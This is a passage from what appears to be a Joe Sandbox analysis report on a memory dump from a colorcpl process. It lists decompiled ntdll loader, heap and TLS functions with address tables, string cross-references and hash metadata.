				short _v570;
				char _v572;
				signed int _v580;
				char _v588;
				signed int _v604;
				signed short _v608;
				void* __esi;
				void* __ebp;
				void* _t25;
				signed int* _t27;
				signed int _t39;
				signed int _t42;
				signed int _t54;
				signed char _t56;
				signed int* _t58;
				intOrPtr* _t65;
				signed int _t67;
				void* _t70;
				signed int _t72;
				signed int _t75;
				void* _t77;
				signed int _t80;
				void* _t82;
				signed int _t85;
				signed int _t87;

				_t70 = __edx;
				_push(__ebx);
				_push(__edi);
				_t72 = __ecx;
				_t25 = E04360130();
				if(_t25 != 0) {
					L04352330(_t25, 0x4435b5c);
					_t27 =  *0x4439224; // 0x0
					_t75 =  *_t27;
					__eflags = _t72;
					if(_t72 != 0) {
						__eflags = _t75;
						if(_t75 == 0) {
							goto L13;
						} else {
							_t80 = _t75 - 1;
							goto L7;
						}
					} else {
						__eflags = _t75;
						if(_t75 == 0) {
							E04339050( *0x443921c, _t75);
						}
						__eflags = _t75 - 0xffffffff;
						if(_t75 == 0xffffffff) {
							L13:
							E043524D0(0x4435b5c);
							_t65 = 0xe;
							asm("int 0x29");
							_t87 = (_t85 & 0xfffffff8) - 0x224;
							_v20 =  *0x443b370 ^ _t87;
							_t76 = _t65;
							 *0x44391e0( &_v544, 0x104, _t75, _t82);
							_t67 =  *_t65() + _t33;
							__eflags = _t67;
							if(_t67 != 0) {
								__eflags =  *0x443660c;
								_v560 =  &_v552;
								_v564 = _t67;
								_v562 = 0x208;
								if(__eflags == 0) {
									L25:
									_push( &_v556);
									_push( &_v564);
									E043CCB20(0x4435b5c, _t72, _t76, __eflags);
									goto L15;
								} else {
									_t76 = ( *0x4436608 & 0x0000ffff) + 2 + _t67;
									_t42 = E04355D90(_t67,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t76);
									_v580 = _t42;
									__eflags = _t42;
									if(_t42 != 0) {
										__eflags = 0;
										_v570 = _t76;
										_v572 = 0;
										E043610D0(_t67,  &_v572, 0x4436608);
										E043610D0(_t67,  &_v580,  &_v572);
										E0434FE40(_t67,  &_v588, ";");
										E04353BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *0x443660c);
										 *0x4436608 = _v608;
										_t54 = _v604;
										 *0x443660c = _t54;
										 *0x4436604 = _t54;
										E043CD4A0(_t67, __eflags);
										goto L25;
									} else {
										_t56 =  *0x44337c0; // 0x0
										__eflags = _t56 & 0x00000003;
										if((_t56 & 0x00000003) != 0) {
											_push("Failed to reallocate the system dirs string !\n");
											_push(0);
											_push("LdrpInitializePerUserWindowsDirectory");
											_push(0xcf4);
											_push("minkernel\\ntdll\\ldrinit.c");
											E043BE692();
											_t56 =  *0x44337c0; // 0x0
											_t87 = _t87 + 0x14;
										}
										__eflags = _t56 & 0x00000010;
										if((_t56 & 0x00000010) != 0) {
											asm("int3");
										}
										_t39 = 0xc0000017;
									}
								}
							} else {
								L15:
								_t39 = 0;
								__eflags = 0;
							}
							_pop(_t77);
							__eflags = _v36 ^ _t87;
							return E04384B50(_t39, 0x4435b5c, _v36 ^ _t87, _t70, _t72, _t77);
						} else {
							_t80 = _t75 + 1;
							__eflags = _t80;
							L7:
							_t58 =  *0x4439224; // 0x0
							 *_t58 = _t80;
							__eflags = _t72;
							if(_t72 != 0) {
								__eflags = _t80;
								if(_t80 == 0) {
									E04339050( *0x443921c, 1);
								}
							}
							_t25 = E043524D0(0x4435b5c);
							goto L1;
						}
					}
				} else {
					L1:
					return _t25;
				}
			}

0x0437c640
0x0437c642
0x0437c644
0x0437c645
0x0437c647
0x0437c64e
0x0437c65a
0x0437c65f
0x0437c664
0x0437c666
0x0437c668
0x0437c6a4
0x0437c6a6
0x00000000
0x0437c6a8
0x0437c6a8
0x00000000
0x0437c6a8
0x0437c66a
0x0437c66a
0x0437c66c
0x0437c675
0x0437c675
0x0437c67a
0x0437c67d
0x0437c6ab
0x0437c6ac
0x0437c6b3
0x0437c6b4
0x0437c6be
0x0437c6cb
0x0437c6dc
0x0437c6df
0x0437c6e9
0x0437c6e9
0x0437c6eb
0x043b8090
0x043b809b
0x043b80a4
0x043b80a9
0x043b80ae
0x043b817f
0x043b8183
0x043b8188
0x043b8189
0x00000000
0x043b80b4
0x043b80c4
0x043b80cc
0x043b80d1
0x043b80d5
0x043b80d7
0x043b8114
0x043b8116
0x043b811b
0x043b812a
0x043b8139
0x043b8148
0x043b815e
0x043b8167
0x043b816c
0x043b8170
0x043b8175
0x043b817a
0x00000000
0x043b80d9
0x043b80d9
0x043b80de
0x043b80e0
0x043b80e2
0x043b80e7
0x043b80e9
0x043b80ee
0x043b80f3
0x043b80f8
0x043b80fd
0x043b8102
0x043b8102
0x043b8105
0x043b8107
0x043b8109
0x043b8109
0x043b810a
0x043b810a
0x043b80d7
0x0437c6f1
0x0437c6f1
0x0437c6f1
0x0437c6f1
0x0437c6f1
0x0437c6fa
0x0437c6fb
0x0437c705
0x0437c67f
0x0437c67f
0x0437c67f
0x0437c680
0x0437c680
0x0437c685
0x0437c687
0x0437c689
0x0437c68b
0x0437c68d
0x0437c697
0x0437c697
0x0437c68d
0x0437c69d
0x00000000
0x0437c69d
0x0437c67d
0x0437c650
0x0437c650
0x0437c653
0x0437c653

Strings

Failed to reallocate the system dirs string !, xrefs: 043B80E2
minkernel\ntdll\ldrinit.c, xrefs: 043B80F3
LdrpInitializePerUserWindowsDirectory, xrefs: 043B80E9

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
API String ID: 0-1783798831
Opcode ID: 4e80f7ad93f006f31644f97409a00ef7e097d8bb92f49b81c4f8c53a1c2ec0e0
Instruction ID: 157b39f9a9cb879624ff23415dd02164e23bf21b21fd36a9ceb3a6826c4074d4
Opcode Fuzzy Hash: 4e80f7ad93f006f31644f97409a00ef7e097d8bb92f49b81c4f8c53a1c2ec0e0
Instruction Fuzzy Hash: F041C3B1604301ABE720EF64DD85B5B77E8EF44B55F05782AB99893250EB78F800CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0433753F Relevance: 3.9, Strings: 3, Instructions: 132
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E0433753F(signed int __ecx, signed int __edx, intOrPtr _a4) {
				unsigned int _v12;
				signed char _t46;
				signed char _t50;
				intOrPtr* _t52;
				unsigned int _t53;
				signed char _t54;
				signed int _t57;
				signed int _t60;
				intOrPtr _t64;
				intOrPtr* _t66;
				signed int _t67;
				unsigned int _t78;
				signed int _t80;

				_t60 = __edx;
				_t80 = __ecx;
				if(__edx == 0 || (__edx & 0x00000007) != 0) {
					L37:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E0433B910();
					} else {
						E0433B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t60 + 8);
					_push(_t80);
					E0433B910("Invalid address specified to %s( %p, %p )\n", _a4);
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x44347a1 = 1;
						asm("int3");
						 *0x44347a1 = 0;
					}
					return 0;
				} else {
					_t46 =  *((intOrPtr*)(__edx + 7));
					if((_t46 & 0x0000003f) == 0) {
						goto L37;
					}
					if(_t46 < 0) {
						if( *((char*)(__ecx + 0xea)) != 2) {
							_t64 = 0;
						} else {
							_t64 =  *((intOrPtr*)(__ecx + 0xe4));
						}
						if(_t64 != 0) {
							if(_t46 != 4) {
								L23:
								return 1;
							}
						}
						goto L37;
					}
					if( *((intOrPtr*)(__ecx + 0x4c)) == 0) {
						L6:
						if( *((char*)(_t60 + 7)) == 4) {
							if((_t60 & 0x00000fff) != 0x18) {
								goto L37;
							}
							L13:
							if( *(_t80 + 0x4c) == 0) {
								_t50 =  *((intOrPtr*)(_t60 + 2));
							} else {
								_t53 =  *_t60;
								if(( *(_t80 + 0x4c) & _t53) != 0) {
									_t53 = _t53 ^  *(_t80 + 0x50);
								}
								_t50 = _t53 >> 0x10;
							}
							if((_t50 & 0x00000004) != 0) {
								if(E043ED62C(_t80, _t60) != 0) {
									goto L18;
								}
							} else {
								L18:
								if( *((char*)(_t60 + 7)) == 4) {
									goto L23;
								}
								_t66 = _t80 + 0xa4;
								_t52 =  *_t66;
								while(_t52 != _t66) {
									if(_t60 <  *((intOrPtr*)(_t52 + 0x14)) || _t60 >=  *((intOrPtr*)(_t52 + 0x18))) {
										_t52 =  *_t52;
										continue;
									} else {
										goto L23;
									}
								}
							}
							goto L37;
						}
						_t54 =  *((intOrPtr*)(_t60 + 6));
						if(_t54 == 0) {
							_t67 = _t80;
						} else {
							_t67 = (_t60 & 0xffff0000) - ((_t54 & 0x000000ff) << 0x10) + 0x10000;
						}
						if(_t67 == 0 ||  *((intOrPtr*)(_t67 + 0x18)) != _t80 || _t60 <  *((intOrPtr*)(_t67 + 0x24)) || _t60 >=  *((intOrPtr*)(_t67 + 0x28))) {
							goto L37;
						} else {
							goto L13;
						}
					}
					_t57 =  *__edx;
					_t78 =  *(__ecx + 0x50) ^ _t57;
					_v12 = _t57;
					_v12 = _t78;
					if(_t78 >> 0x18 != (_t78 >> 0x00000010 ^ _t78 >> 0x00000008 ^ _t78)) {
						goto L37;
					}
					goto L6;
				}
			}

0x04337548
0x0433754b
0x0433754f
0x0439ad1e
0x0439ad28
0x0439ad47
0x0439ad4c
0x0439ad2a
0x0439ad3f
0x0439ad44
0x0439ad55
0x0439ad56
0x0439ad5f
0x0439ad71
0x0439ad73
0x0439ad7a
0x0439ad7b
0x0439ad7b
0x00000000
0x0433755e
0x0433755e
0x04337563
0x00000000
0x00000000
0x0433756b
0x04337639
0x04337659
0x0433763b
0x0433763b
0x0433763b
0x04337643
0x0433764b
0x04337626
0x00000000
0x04337626
0x0433764d
0x00000000
0x04337643
0x04337575
0x0433759d
0x043375a1
0x0439ad06
0x00000000
0x00000000
0x043375eb
0x043375ef
0x0433765d
0x043375f1
0x043375f1
0x043375f6
0x043375f8
0x043375f8
0x043375fb
0x043375fb
0x04337600
0x0439ad18
0x00000000
0x00000000
0x04337606
0x04337606
0x0433760a
0x00000000
0x00000000
0x0433760c
0x04337612
0x04337614
0x0433761f
0x0433762e
0x00000000
0x00000000
0x00000000
0x00000000
0x0433761f
0x04337614
0x00000000
0x04337600
0x043375a7
0x043375ac
0x04337652
0x043375b2
0x043375c2
0x043375c2
0x043375ca
0x00000000
0x00000000
0x00000000
0x00000000
0x043375ca
0x04337577
0x0433757c
0x0433757e
0x04337583
0x04337597
0x00000000
0x00000000
0x00000000
0x04337597

Strings

Invalid address specified to %s( %p, %p ), xrefs: 0439AD5A
HEAP: , xrefs: 0439AD47
HEAP[%wZ]: , xrefs: 0439AD3A

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
API String ID: 0-1151232445
Opcode ID: 080575b5ad7d26491bd5f4fa0c8e651b26d7db87ce681c350462b54ffa5dd315
Instruction ID: 7a15a1983b0b84bc3c39eaf436803131a46d0caae14a4ba4a54eaa653f440ffc
Opcode Fuzzy Hash: 080575b5ad7d26491bd5f4fa0c8e651b26d7db87ce681c350462b54ffa5dd315
Instruction Fuzzy Hash: F84106742006808FFF29EF1CC0A47B677D49F0130AF2CA5A9D4868BA96C7B5F845CB21

Uniqueness

Uniqueness Score: -1.00%

Function 043715EF Relevance: 3.9, Strings: 3, Instructions: 127
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E043715EF(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t59;
				intOrPtr _t62;
				signed int _t83;
				intOrPtr _t87;
				intOrPtr _t95;
				intOrPtr* _t98;
				signed int _t99;
				intOrPtr _t102;
				void* _t104;
				void* _t106;

				_push(0x38);
				_push(0x441c6d0);
				E04397BE4(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t104 - 0x2c)) =  *[fs:0x18];
				 *((intOrPtr*)(_t104 - 0x24)) =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				 *((intOrPtr*)(_t104 - 0x1c)) = 0;
				L043453C0(0x4436718);
				_t83 =  *0x4435c90; // 0x8
				 *(_t104 - 0x48) = _t83;
				if(_t83 == 0) {
					_t102 =  *((intOrPtr*)(_t104 - 0x2c)) + 0x2c;
					L9:
					 *((intOrPtr*)( *((intOrPtr*)(_t104 - 0x2c)) + 0x2c)) = _t102;
					asm("lock inc dword [0x4435c80]");
					E043452F0(_t83, 0x4436718);
					_t59 = 0;
					L10:
					 *[fs:0x0] =  *((intOrPtr*)(_t104 - 0x10));
					return _t59;
				}
				_t102 = E0437174A(_t83);
				 *((intOrPtr*)(_t104 - 0x40)) = _t102;
				if(_t102 == 0) {
					E043452F0(_t83, 0x4436718);
					_t59 = 0xc0000017;
					goto L10;
				}
				 *((intOrPtr*)(_t104 - 0x30)) = 0x44333a8;
				_t62 =  *0x44333a8; // 0x2713140
				 *((intOrPtr*)(_t104 - 0x20)) = _t62;
				while(1) {
					_t98 =  *((intOrPtr*)(_t104 - 0x20));
					if(_t98 ==  *((intOrPtr*)(_t104 - 0x30))) {
						goto L9;
					}
					 *((intOrPtr*)(_t104 - 0x44)) = _t98;
					 *((intOrPtr*)(_t104 - 0x20)) =  *_t98;
					 *((intOrPtr*)(_t104 - 0x28)) = E04371715(_t98, _t104 - 0x34);
					_t87 =  *0x4435d78; // 0x0
					_t88 = _t87 + 0xc0000;
					 *(_t104 - 0x38) =  *(_t104 - 0x34);
					_t95 = E04355D90(_t87 + 0xc0000,  *((intOrPtr*)(_t104 - 0x24)), _t87 + 0xc0000, _t65 +  *(_t104 - 0x34) + 1);
					if(_t95 == 0) {
						 *((intOrPtr*)(_t104 - 0x1c)) = 0xc0000017;
						L13:
						E043452F0(_t88, 0x4436718);
						_t99 = 0;
						do {
							_t69 =  *((intOrPtr*)(_t102 + _t99 * 4));
							if( *((intOrPtr*)(_t102 + _t99 * 4)) != 0) {
								E04353BC0( *((intOrPtr*)(_t104 - 0x24)), 0,  *((intOrPtr*)(_t69 - 4)));
							}
							_t99 = _t99 + 1;
						} while (_t99 <  *(_t104 - 0x48));
						_t42 = _t102 - 8; // -8
						E04353BC0( *((intOrPtr*)(_t104 - 0x24)), 0, _t42);
						_t59 =  *((intOrPtr*)(_t104 - 0x1c));
						goto L10;
					}
					_t19 =  *(_t104 - 0x38) + 1; // 0x1
					_t88 = _t19 + _t95 &  !( *(_t104 - 0x38));
					 *((intOrPtr*)(_t88 - 4)) = _t95;
					_t21 = _t98 + 0x24; // 0x771f33c8
					 *(_t102 +  *_t21 * 4) = _t88;
					 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
					_t27 = _t98 + 8; // 0x18
					E043888C0(_t88,  *_t27,  *((intOrPtr*)(_t104 - 0x28)));
					_t106 = _t106 + 0xc;
					 *(_t104 - 4) = 0xfffffffe;
					if( *((intOrPtr*)(_t104 - 0x1c)) < 0) {
						goto L13;
					}
					if(( *0x44337c0 & 0x00000005) != 0) {
						_t45 = _t98 + 0x24; // 0x771f33c8
						_t83 =  *_t45;
						_push( *((intOrPtr*)(_t102 + _t83 * 4)));
						_t48 = _t98 + 8; // 0x18
						_push( *_t48);
						_t49 = _t98 + 0xc; // 0x0
						_t50 = _t98 + 8; // 0x18
						_push( *_t49 -  *_t50);
						_push(_t83);
						E043BE692("minkernel\\ntdll\\ldrtls.c", 0x369, "LdrpAllocateTls", 2, "TlsVector %p Index %d : %d bytes copied from %p to %p\n", _t102);
						_t106 = _t106 + 0x28;
					}
				}
				goto L9;
			}

0x043715ef
0x043715f1
0x043715f6
0x04371601
0x0437160d
0x04371612
0x0437161b
0x04371620
0x04371626
0x0437162b
0x043716ed
0x043716f0
0x043716f3
0x043716f6
0x043716fe
0x04371703
0x04371705
0x04371708
0x04371714
0x04371714
0x04371636
0x04371638
0x0437163d
0x043b18ae
0x043b18b3
0x00000000
0x043b18b3
0x04371643
0x0437164a
0x0437164f
0x04371652
0x04371652
0x04371658
0x00000000
0x00000000
0x0437165e
0x04371665
0x04371672
0x04371675
0x0437167b
0x04371684
0x04371694
0x04371698
0x043b18bd
0x043b18c4
0x043b18c5
0x043b18ca
0x043b18cc
0x043b18cc
0x043b18d1
0x043b18db
0x043b18db
0x043b18e0
0x043b18e1
0x043b18e6
0x043b18ef
0x043b18f4
0x00000000
0x043b18f4
0x043716a1
0x043716a8
0x043716aa
0x043716ad
0x043716b0
0x043716b3
0x043716ba
0x043716be
0x043716c3
0x043716c6
0x043716d2
0x00000000
0x00000000
0x043716df
0x043b1931
0x043b1931
0x043b1934
0x043b1937
0x043b1937
0x043b193a
0x043b193d
0x043b1940
0x043b1941
0x043b1959
0x043b195e
0x043b195e
0x043716df
0x00000000

Strings

LdrpAllocateTls, xrefs: 043B194A
TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 043B1943
minkernel\ntdll\ldrtls.c, xrefs: 043B1954

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
API String ID: 0-4274184382
Opcode ID: 6abd706d5553bbeb7e1bb0ea73657dfb7e1ef002bc3965ab3fb5695d71ea156a
Instruction ID: af179192c4c4a74a02b67dada89760d8baecd0b942ce187ff29363763ada77b7
Opcode Fuzzy Hash: 6abd706d5553bbeb7e1bb0ea73657dfb7e1ef002bc3965ab3fb5695d71ea156a
Instruction Fuzzy Hash: 20416A76A00605AFEB25DFA8C851BAEBBF5FF48704F049119E945A7750D739B800CF90

Uniqueness

Uniqueness Score: -1.00%

Function 04371527 Relevance: 3.8, Strings: 3, Instructions: 98
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E04371527(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t17;
				intOrPtr _t19;
				signed int _t25;
				signed int _t28;
				intOrPtr _t35;
				signed int _t39;
				signed int _t41;
				signed int _t43;
				void* _t45;
				signed int _t51;

				_t32 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_push(_t28);
				_t43 =  *0x4435d8c; // 0x2711e28
				_push(_t39);
				if(_t43 == 0x4435d8c) {
					L5:
					 *0x4435c90 =  *0x4435c90 & 0x00000000;
					 *0x4435c94 =  *0x4435c94 & 0x00000000;
					_t51 =  *0x4435c94;
					L6:
					_t17 = E043715EF(_t28, _t39, _t43, _t51);
					L7:
					return _t17;
				}
				_t28 = 1;
				do {
					_t39 = _t43;
					_t43 =  *_t43;
					_t4 = _t39 + 0x18; // 0x660000
					_t19 = E0434DE20(_t32, 1,  *_t4, _t28, 9,  &_v12);
					_v12 = _t19;
					if(_t19 != 0) {
						__eflags =  *0x44337c0 & 0x00000005;
						if(__eflags != 0) {
							_push(_t19);
							_t12 = _t39 + 0x24; // 0x2711e4c
							E043BE692("minkernel\\ntdll\\ldrtls.c", 0x241, "LdrpInitializeTls", 2, "DLL \"%wZ\" has TLS information at %p\n", _t12);
							_t19 = _v12;
							_t45 = _t45 + 0x1c;
						}
						_push(0);
						_push(0);
						_push( &_v8);
						_t32 = _t19;
						_t17 = E04371796(_t28, _t19, _t39, _t39, _t43, __eflags);
						__eflags = _t17;
						if(__eflags < 0) {
							goto L7;
						}
						 *((short*)(_t39 + 0x3a)) = 0xffff;
					}
				} while (_t43 != 0x4435d8c);
				_t43 = _v8;
				if(_t43 != 0) {
					_t11 = _t43 + 8; // 0x8
					_t41 = _t11;
					__eflags = _t41 - 0x20;
					if(_t41 > 0x20) {
						_t35 =  *0x4435d78; // 0x0
						_t14 = _t43 + 0x27; // 0x27
						_t28 = _t14 >> 5;
						_t25 = E04355D90(_t35 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, _t28 << 2);
						__eflags = _t25;
						if(_t25 != 0) {
							_t43 = _v8;
							L13:
							 *0x4435c90 = _t41;
							_t39 = 0x4435c90;
							 *0x4435c98 = _t28;
							 *0x4435c94 = _t25;
							E04371AD0(0x4435c90, 0, _t43);
							E04371B10(0x4435c90, _t43, 8);
							goto L6;
						}
						_t17 = 0xc0000017;
						goto L7;
					}
					_t25 = 0x4435c88;
					goto L13;
				}
				goto L5;
			}

0x04371527
0x0437152c
0x0437152d
0x0437152e
0x04371532
0x04371534
0x0437153a
0x04371541
0x0437156f
0x0437156f
0x04371576
0x04371576
0x0437157d
0x0437157d
0x04371582
0x04371586
0x04371586
0x04371545
0x04371546
0x04371549
0x0437154b
0x04371551
0x04371554
0x04371559
0x0437155e
0x04371587
0x0437158e
0x043b1845
0x043b1846
0x043b1860
0x043b1865
0x043b1868
0x043b1868
0x04371594
0x04371596
0x0437159d
0x0437159e
0x043715a0
0x043715a5
0x043715a7
0x00000000
0x00000000
0x043715ae
0x043715ae
0x04371560
0x04371568
0x0437156d
0x043715b4
0x043715b4
0x043715b7
0x043715ba
0x043b1870
0x043b1876
0x043b1879
0x043b1892
0x043b1897
0x043b1899
0x043b18a5
0x043715c5
0x043715c6
0x043715cc
0x043715d4
0x043715da
0x043715df
0x043715e8
0x00000000
0x043715e8
0x043b189b
0x00000000
0x043b189b
0x043715c0
0x00000000
0x043715c0
0x00000000

Strings

DLL "%wZ" has TLS information at %p, xrefs: 043B184A
minkernel\ntdll\ldrtls.c, xrefs: 043B185B
LdrpInitializeTls, xrefs: 043B1851

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
API String ID: 0-931879808
Opcode ID: 78931e952169d3cb145e514268a7e1ec6173d13d2ae1a1e5d3dc04d052a7d3e9
Instruction ID: 3f2cf6b6bf6b97e6dbad63d3599be4e767faf0d834589f490d44489eb48b5c94
Opcode Fuzzy Hash: 78931e952169d3cb145e514268a7e1ec6173d13d2ae1a1e5d3dc04d052a7d3e9
Instruction Fuzzy Hash: E531B372A10204BBFF349F54C845BAA76A8FF44B69F01112AE586A7680E778FD449B90

Uniqueness

Uniqueness Score: -1.00%

Function 04381190 Relevance: 3.8, Strings: 3, Instructions: 97
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E04381190(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, signed int _a8) {
				signed int _v8;
				char _v12;
				char _v20;
				char _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char* _v44;
				intOrPtr _v48;
				char _v52;
				signed int _t38;
				signed int _t39;
				void* _t55;
				void* _t61;
				void* _t62;
				signed int _t63;
				void* _t65;
				signed int _t70;

				_t55 = __edx;
				E04385050(__ecx,  &_v20, __ecx);
				_v52 = 0x18;
				_v44 =  &_v20;
				_v48 = 0;
				_push( &_v52);
				_push(0x20019);
				_v40 = 0x40;
				_push( &_v12);
				_v36 = 0;
				_v32 = 0;
				_t62 = E04382AB0();
				if(_t62 < 0) {
					L9:
					return _t62;
				}
				_t38 = _a8;
				_t63 = 2;
				_t39 = _t38 * _t63;
				_t70 = _t38 * _t63 >> 0x20;
				if(_t70 < 0 || _t70 <= 0 && _t39 <= 0xffffffff) {
					_v8 = _t39;
					_push( &_v8);
					_t61 = 0xc;
					_t58 = _t39;
					if(E0437457E(_t39, _t61) < 0) {
						goto L13;
					}
					_t65 = E04355D90(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
					if(_t65 == 0) {
						_t62 = 0xc0000017;
					} else {
						E04385050(_t58,  &_v28, _t55);
						_push( &_a8);
						_push(_v8);
						_push(_t65);
						_push(_t63);
						_push( &_v28);
						_push(_v12);
						_t62 = E04382B00();
						if(_t62 >= 0) {
							_t28 = _t65 + 0xc; // 0xc
							E043888C0(_a4, _t28,  *((intOrPtr*)(_t65 + 8)));
						}
						E04353BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t65);
					}
					_push(_v12);
					E04382A80();
					goto L9;
				} else {
					L13:
					_push(_v12);
					E04382A80();
					return 0xc0000095;
				}
			}

0x0438119f
0x043811a2
0x043811aa
0x043811b1
0x043811b9
0x043811bc
0x043811bd
0x043811c5
0x043811cc
0x043811cd
0x043811d0
0x043811d8
0x043811dc
0x0438126d
0x00000000
0x0438126d
0x043811e2
0x043811e7
0x043811e8
0x043811ea
0x043811ec
0x04381200
0x04381203
0x04381206
0x04381207
0x04381210
0x00000000
0x00000000
0x04381229
0x0438122d
0x0438128a
0x0438122f
0x04381234
0x0438123c
0x0438123d
0x04381243
0x04381244
0x04381245
0x04381246
0x0438124e
0x04381252
0x04381279
0x04381280
0x04381285
0x04381260
0x04381260
0x04381265
0x04381268
0x00000000
0x043b9a99
0x043b9a99
0x043b9a99
0x043b9a9c
0x00000000
0x043b9aa1

Strings

\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0438119B
@, xrefs: 043811C5
BuildLabEx, xrefs: 0438122F

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
API String ID: 0-3051831665
Opcode ID: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
Instruction ID: fa957c88578696039c5dbdb221f1759a33d1f00fccc22afec8a2b6ae459cb7f4
Opcode Fuzzy Hash: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
Instruction Fuzzy Hash: 8B3192B2900619BBDF11AF94CC44EEFFBBDEF84764F005029E904A7160E730E9059B90

Uniqueness

Uniqueness Score: -1.00%

Function 043551C0 Relevance: 3.2, Strings: 2, Instructions: 658
COMMONCrypto

Download Yara Rule

C-Code - Quality: 76%

			E043551C0(signed int _a4, signed short _a8, signed int _a12, signed short _a16, intOrPtr _a20, intOrPtr* _a24, signed short _a28, signed int _a32, signed int* _a36) {
				signed int _v8;
				char _v532;
				void* _v568;
				signed int _v616;
				intOrPtr _v632;
				signed int _v660;
				void* _v664;
				intOrPtr _v668;
				intOrPtr _v672;
				signed int _v676;
				void* _v680;
				signed int _v692;
				signed int _v696;
				signed short _v700;
				signed int _v704;
				intOrPtr _v708;
				signed int _v712;
				signed short _v716;
				signed int _v720;
				signed int _v724;
				intOrPtr _v728;
				signed int _v732;
				signed int* _v736;
				signed int _v740;
				signed short _v744;
				void* _v748;
				signed int _v752;
				signed short _v756;
				signed short _v760;
				signed int _v764;
				void* _v768;
				void* _v772;
				void* _v776;
				void* _v780;
				void* _v782;
				void* _v784;
				void* _v788;
				void* _v792;
				void* _v796;
				void* _v798;
				void* _v800;
				void* _v802;
				void* _v804;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t223;
				signed short _t224;
				signed short* _t226;
				signed short _t229;
				unsigned int _t233;
				signed int _t237;
				signed int _t240;
				signed short _t244;
				signed short _t250;
				signed short _t255;
				signed short _t257;
				signed short _t261;
				signed short _t270;
				signed int _t271;
				signed short _t272;
				signed int _t273;
				unsigned int _t274;
				signed short* _t276;
				signed int _t280;
				unsigned int _t281;
				signed int _t299;
				intOrPtr _t301;
				void* _t305;
				signed short* _t313;
				signed int _t315;
				intOrPtr _t317;
				intOrPtr _t322;
				signed int _t330;
				intOrPtr* _t332;
				void* _t333;
				intOrPtr _t336;
				signed int _t337;
				intOrPtr _t338;
				signed short* _t339;
				signed short _t340;
				signed int _t343;
				signed short _t344;
				signed short _t346;
				short* _t347;
				signed int _t360;
				signed int _t361;
				signed int _t362;
				signed int _t367;
				signed short _t369;
				signed int _t370;
				signed int _t372;
				signed short _t376;
				signed short _t377;
				signed int _t386;
